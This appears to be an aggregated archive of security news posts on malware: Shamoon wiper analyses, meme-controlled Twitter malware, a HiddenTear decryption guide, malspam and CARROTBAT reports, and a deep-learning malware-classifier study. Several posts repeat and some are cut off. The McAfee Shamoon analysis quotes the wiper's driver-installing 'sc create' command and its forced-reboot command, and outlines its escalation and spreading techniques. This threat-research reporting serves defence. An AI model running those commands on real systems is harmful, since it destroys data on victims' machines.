Category Archives: Malware

Security Affairs: Malware controlled through commands hidden in memes posted on Twitter

New Malware Takes Commands From Memes Posted On Twitter

Security researchers at Trend Micro have spotted a new strain of malware that retrieved commands from memes posted on a Twitter account controlled by the attackers. In this way, attackers make it hard to detect traffic associated with the malware that is this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty, it the past crooks used legitimate services like Gmail, DropBox, PasteBin, and also Twitter to control malicious codes.

The malware discovered by Trend Micro leverages on the steganography to hide the commands embedded in a meme posted on Twitter. 

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes, it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

twitter memes malware

Below the list of commands supported by the malware:

CommandsDescription
/printScreen capture
/processosRetrieve list of running processes
/clipCapture clipboard content
/usernameRetrieve username from infected machine
/docsRetrieve filenames from a predefined path such as (desktop, %AppData% etc.)

According to Trend Micro, the malware is in the early stages of its development, experts noticed that the Pastebin link points to a local, 

Pierluigi Paganini

(SecurityAffairs –malware, memes)

The post Malware controlled through commands hidden in memes posted on Twitter appeared first on Security Affairs.



Security Affairs

Malware controlled through commands hidden in memes posted on Twitter

New Malware Takes Commands From Memes Posted On Twitter

Security researchers at Trend Micro have spotted a new strain of malware that retrieved commands from memes posted on a Twitter account controlled by the attackers. In this way, attackers make it hard to detect traffic associated with the malware that is this case appears as legitimate Twitter traffic.

The use of legitimate web services to control malware is not a novelty, it the past crooks used legitimate services like Gmail, DropBox, PasteBin, and also Twitter to control malicious codes.

The malware discovered by Trend Micro leverages on the steganography to hide the commands embedded in a meme posted on Twitter. 

“This new threat (detected as TROJAN.MSIL.BERBOMTHUM.AA) is notable because the malware’s commands are received via a legitimate service (which is also a popular social networking platform), employs the use of benign-looking yet malicious memes, and it cannot be taken down unless the malicious Twitter account is disabled.” reads the post published by Trend Micro.

“Twitter has already taken the account offline as of December 13, 2018.”

Attackers hid the “/print” command in the memes, it allows them to take screenshots of the infected machine and send them back to a C&C server whose address is obtained through a hard-coded URL on pastebin.com.

The BERBOMTHUM malware checks the Twitter account used by the attackers, downloads and scans meme files, and extracts the command they include.

The Twitter account used by miscreants was created in 2017 and contained only two memes posted on October 25 and 26. The images were used to deliver the “/print” commands to the malware.

twitter memes malware

Below the list of commands supported by the malware:

CommandsDescription
/printScreen capture
/processosRetrieve list of running processes
/clipCapture clipboard content
/usernameRetrieve username from infected machine
/docsRetrieve filenames from a predefined path such as (desktop, %AppData% etc.)

According to Trend Micro, the malware is in the early stages of its development, experts noticed that the Pastebin link points to a local, 

Pierluigi Paganini

(SecurityAffairs –malware, memes)

The post Malware controlled through commands hidden in memes posted on Twitter appeared first on Security Affairs.

Malware Using Memes Posted on Twitter as C&C Service

Researchers have observed a new threat using malicious memes posted on Twitter to receive command-and-control (C&C) instructions. Trend Micro observed that the malicious activity begins after a threat detected as “TROJAN.MSIL.BERBOMTHUM.AA” executes on an infected machine. As of this writing, the Japanese multinational digital security firm had not identified the delivery mechanism for the malware. […]… Read More

The post Malware Using Memes Posted on Twitter as C&C Service appeared first on The State of Security.

New Malware Takes Commands From Memes Posted On Twitter

Security researchers have discovered yet another example of how cybercriminals disguise their malware activities as regular traffic by using legitimate cloud-based services. Trend Micro researchers have uncovered a new piece of malware that retrieves commands from memes posted on a Twitter account controlled by the attackers. Most malware relies on communication with their

Security Affairs: A second sample of the Shamoon V3 wiper analyzed by the experts

A second sample of the Shamoon wiper was uploaded to Virus total on December 13, from the Netherlands, experts analyzed it.

Last week security experts at Chronicle announced the discovery of a new variant of the infamous Shamoon malware, the sample was uploaded to Virus Total from Italy at around the time Italian oil services company Saipem announced to have suffered a cyber attack.

Over 300 of the servers at Saipem had been infected by Shamoon.

Now security experts have spotted a different sample of the new Shamoon variant, a circumstance that could suggest the attack was greater than initially thought, 

The second sample was uploaded to Virus total on December 13, from the Netherlands.

Malware researchers at Anomali Labs confirmed that this second sample is different from the one discovered by Chronicle.

The trigger date is set in the past, but to December 12, 2017, five days later than the one set in the variant identified by Chronicle. The trigger date is likely set to the past to allow immediate execution on the target system. 

The trigger date could be retrieved by the C2, but the sample analyzed by 
Anomali Labs did not include any reference to command and control servers. 

“A defining characteristic of this new Shamoon version is that it shares nearly 80 percent similarity with earlier versions of Shamoon and may use a historic trigger date, so that it can immediately perform destructive actions once infecting a user’s machine.” reads the analysis published by Anomaly Labs.

“Although not confirmed to be the work of Iranian APT groups, the malware’s codebase, targeted sector, and targeted geography have all been observed in historic attacks which were later attributed to adversaries from the region.”

The newly identified sample is UPX packed in the attempt to modify the signature of the malware to make it harder the detection.

The new Shamoon variant also uses “VMWare Workstation” in its file description in an attempt to utilize a legitimate software product as a lure to victims.

“Anomali Labs has not correlated this sample to an active cyber-attack at this time, however, analysts believe that it may represent additional targets as part of the Shamoon V3 campaign.” concludes Anomali Labs.

Further details, including IoCs are reported in the analysis 

Pierluigi Paganini

(SecurityAffairs –Shamoon v3, hacking)

The post A second sample of the Shamoon V3 wiper analyzed by the experts appeared first on Security Affairs.



Security Affairs

A second sample of the Shamoon V3 wiper analyzed by the experts

A second sample of the Shamoon wiper was uploaded to Virus total on December 13, from the Netherlands, experts analyzed it.

Last week security experts at Chronicle announced the discovery of a new variant of the infamous Shamoon malware, the sample was uploaded to Virus Total from Italy at around the time Italian oil services company Saipem announced to have suffered a cyber attack.

Over 300 of the servers at Saipem had been infected by Shamoon.

Now security experts have spotted a different sample of the new Shamoon variant, a circumstance that could suggest the attack was greater than initially thought, 

The second sample was uploaded to Virus total on December 13, from the Netherlands.

Malware researchers at Anomali Labs confirmed that this second sample is different from the one discovered by Chronicle.

The trigger date is set in the past, but to December 12, 2017, five days later than the one set in the variant identified by Chronicle. The trigger date is likely set to the past to allow immediate execution on the target system. 

The trigger date could be retrieved by the C2, but the sample analyzed by 
Anomali Labs did not include any reference to command and control servers. 

“A defining characteristic of this new Shamoon version is that it shares nearly 80 percent similarity with earlier versions of Shamoon and may use a historic trigger date, so that it can immediately perform destructive actions once infecting a user’s machine.” reads the analysis published by Anomaly Labs.

“Although not confirmed to be the work of Iranian APT groups, the malware’s codebase, targeted sector, and targeted geography have all been observed in historic attacks which were later attributed to adversaries from the region.”

The newly identified sample is UPX packed in the attempt to modify the signature of the malware to make it harder the detection.

The new Shamoon variant also uses “VMWare Workstation” in its file description in an attempt to utilize a legitimate software product as a lure to victims.

“Anomali Labs has not correlated this sample to an active cyber-attack at this time, however, analysts believe that it may represent additional targets as part of the Shamoon V3 campaign.” concludes Anomali Labs.

Further details, including IoCs are reported in the analysis 

Pierluigi Paganini

(SecurityAffairs –Shamoon v3, hacking)

The post A second sample of the Shamoon V3 wiper analyzed by the experts appeared first on Security Affairs.

Decrypting HiddenTear Ransomware for free with HT Brute Forcer

Good news for the victims of the dreaded HiddenTear Ransomware, the popular cybersecurity expert Michael Gillespie has devised a tool dubbed HT Brute Forcer that could allow decrypting files for free.

In 2015, the Turkish security researchers Utku Sen published the HiddenTear ransomware, the first open source ransomware, for educational purposes.

The original code was decryptable, for this reason, many other variants based on it were decryptable too. 
HT Brute Forcer currently supports several HiddenTear variants, including:

8lock8, AnonCrack, Assembly, Balbaz, BankAccountSummary, Bansomqare Wanna, Blank, BloodJaws, Boris, CerberTear, CryptConsole2, CryptoKill, CyberResearcher, Data_Locker, Dev-Nightmare 2xx9, Diamond, Domino, Donut, dotRansom, Executioner, Executioner2, Executioner3, Explerer, FlatChestWare, Frog, Fuck_You, Gendarmerie, Horros, JobCrypter, Jodis, J-Ransomware, J-Want-To-Cry, Karmen, Kraken 2.0, Kratos, LanRan, Lime, Lime-HT, Luv, Matroska, MireWare, MoonCrypter, MTC, Nobug, Nulltica, onion3cry, OpsVenezuela, Paul, PayOrDie, Pedo, PGPSnippet, Poolezoor, Pransomware, Predator, Qwerty, Random6, Random6 2, Randion, RansomMine, Rootabx, Saramat, Shrug, ShutUpAndDance, Sorry, Symbiom, TearDr0p, Technicy, The Brotherhood, TheZone, tlar, TotalWipeOut, TQV, Ton, VideoBelle, WhiteRose, WhiteRose2, Zalupaid, ZenCrypt, Zenis, ZeroRansom, Zorro

Victims of the HiddenTear Ransomware could follow the step by step procedure, published by Bleeping Computer, to decrypt their files for free.

  • Click on the Browse Sample button and choose an encrypted PNG file. Experts suggest choosing the smaller one.
  • Click on the Start Bruteforce button to start brute forcing the decryption key. The process can take some time.
  • When the tool has found the encryption key, the decryptor will automatically decrypt the test file and ask the users to determine if it was correctly decrypted.
  • If the file was decrypted properly, users should save the discovered key and use it with the HiddenTear decryptor.
  • Download the standalone HiddenTear decryptor.
  • Double-click on the hidden-tear-decrypter.exe file to start the tool, enter the key that was discovered by the brute forcer and click on the Decrypt My Files button.
  • Once the decryption process has finished, it will display a screen stating how many files were decrypted.

Pierluigi Paganini

(SecurityAffairs –HT Brute Forcer, ransomware)

The post Decrypting HiddenTear Ransomware for free with HT Brute Forcer appeared first on Security Affairs.

McAfee Blogs: Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.



McAfee Blogs

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Malspam Campaign Impersonates UK Businesses to Target Victims With Banking Trojan

Security researchers discovered a malspam campaign targeting British computer users with the Ursnif/Gozi/ISFB Trojan.

According to My Online Security, the campaign lures victims with phony messages supposedly coming from one of the United Kingdom’s largest banks and other companies. Details of the attack first surfaced on Twitter, as security experts posted examples of malicious emails that used social engineering to dupe recipients into downloading the banking Trojan.

One message that purported to come from Lloyds Bank, for example, was designed to look like a fraud alert and came with a PDF attachment. Targets who clicked on a link to a Google Doc within the PDF wound up launching a VBS file containing the malware binary.

Malicious Emails Are More Than Just Their Name

Beyond simply imitating well-known organizations, attackers behind the malspam campaign are also playing on the psychology of those who might be worried about their personal finances. The subject line for one message, for instance, reads, “Do you recognize each transaction listed above?”

As one security researcher pointed out, most people do not think to click on the area of the message that would reveal the sender’s domain. Instead, they just see the organization’s name, such as Lloyds Bank, and assume it’s genuine.

This seemingly small mistake can have serious consequences. The Ursnif/Gozi/ISFB Trojan, which has been active for several years, is designed to steal banking credentials as well as usernames and passwords for PayPal and other online services.

Learn From Other Malspam Campaigns to Defend Your Organization

Cybercriminals have an obvious interest in email as a platform to distribute banking Trojans and other threats because of how often people use email every day. This also means, however, there are some good case studies readily available that show how malspam campaigns work and how to ensure you don’t become a victim.

A recent analysis from IBM X-Force researchers, for example, showed how the Necurs botnet was able to use highly sophisticated techniques to tailor large quantities of spam to local languages across multiple countries. Besides investing in a threat intelligence platform, it’s always a good idea to remind employees not to open unsolicited email messages — and, even if they’re from familiar names, to make sure they’re legitimate.

Source: My Online Security

The post Malspam Campaign Impersonates UK Businesses to Target Victims With Banking Trojan appeared first on Security Intelligence.

Shamoon Returns to Wipe Systems in Middle East, Europe

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, while resulting in unprofitability and diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting the possibility that this version is a beta or test phase.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.

Analysis

Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:


The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.

Overview

Dropper

Executable summary

The dropper contains other malicious components masked as encrypted files embedded in PE section.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file key8854321.pub (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\key8854321.pub.

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$
  • C$\WINDOWS
  • D$\WINDOWS
  • E$\WINDOWS

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\\Windows\System32\.

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service is already created, it changes the configuration parameter of the service with the previous configuration.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:

 

 

 

The worm module dropped on the system can have any one of the following names:

Next the wiper runs to destroy the data.

Wiper

The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

This preceding file is not malicious but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul

 

The following screenshot shows the execution of this command:

 

The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2

 

Once the system is rebooted it shows a blue screen:

Worm

The worm component is extracted from the resources from the dropper. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.

Conclusion

Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

New Shamoon Malware Variant Targets Italian Oil and Gas Company

Shamoon is back… one of the most destructive malware families that caused damage to Saudi Arabia's largest oil producer in 2012 and this time it has targeted energy sector organizations primarily operating in the Middle East. Earlier this week, Italian oil drilling company Saipem was attacked and sensitive files on about 10 percent of its servers were destroyed, mainly in the Middle East,

Android Malware Steals from PayPal Accounts

What happens when you combine a remotely controlled banking Trojan with an abuse of Android Accessibility services? According to new research from ESET, you get an Android Trojan that steals money from

The post Android Malware Steals from PayPal Accounts appeared first on The Cyber Security Place.

CARROTBAT Malware Family Supports at Least 12 Unique Decoy Documents

A malware family known as CARROTBAT is currently supporting at least 12 unique decoy documents to reel in unsuspecting users.

Palo Alto Networks’ Unit 42 threat research team came across CARROTBAT back in 2017 while investigating a cyberattack against the British government. Further analysis revealed that the malware family functions as part of Fractured Block, an attack campaign targeting Southeast Asia that uses lures related to North and South Korea. The operation also leverages cryptocurrency-related subject matter to lure potential victims.

The malware functions as a dropper that enables attackers to drop and deploy an embedded decoy file. Once a user opens the decoy file, an obfuscated command executes on the system, causing a payload to run on the targeted machine.

In all, Unit 42 observed 29 samples of the malware family with compile dates ranging from March 2018 to September 2018. Those samples used a combined 12 different decoy files in their attacks.

Ties to Other Digital Threats

CARROTBAT has ties to other digital threats that are currently in circulation. Unit 42 came across four executable files belonging to the malware after pivoting on a domain that hosted SYSCON back in December 2017. First reported on by Trend Micro, SYSCON is an unsophisticated malware family known for using file transfer protocol (FTP) as a command-and-control (C&C) communication channel.

Researchers also found a sample of Konni, a remote access Trojan analyzed by Cisco Talos in May 2017, residing on the same domain hosting SYSCON at the time of CARROTBAT’s discovery. Palo Alto Networks said it’s still investigating these relationships, but researchers suspect this combined threat activity “may all belong to the same threat actor.”

Use UEM to Detect Malware Like CARROTBAT

Security professionals can defend their organizations against malware like CARROTBAT with the help of a unified endpoint management (UEM) solution that offers mobile threat management and other advanced features. They should also consider using deception to mislead malware attacks, especially those powered by artificial intelligence (AI).

Source: Palo Alto Networks, Trend Micro, Cisco Talos

The post CARROTBAT Malware Family Supports at Least 12 Unique Decoy Documents appeared first on Security Intelligence.

Destructive Shamoon Malware Attacks Italian Oil Services Firm

The data-wiping Shamoon malware resurfaced this week at Italian oil and gas contractor Saipem, where it destroyed files on about 10 percent of company PCs, according to a published report. The attacks may be linked to Saipem's work with Saudi Aramco, a target of earlier Shamoon attacks.

The post Destructive Shamoon Malware Attacks Italian Oil...

Read the whole entry... »

Related Stories

IT consultancy firm caught running ransomware decryption scam

By Waqas

Ransomware has become a persistent threat to users globally but for cybercriminals, it is a lucrative business. Recently, IT security researchers at Check Point unearthed a sophisticated ransomware decryption scam in which a Russian IT consultant company has been caught scamming ransomware victims. The company according to Check Point researchers calls itself ‘Dr. Shifro’ and claims to provide […]

This is a post from HackRead.com Read the original post: IT consultancy firm caught running ransomware decryption scam

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

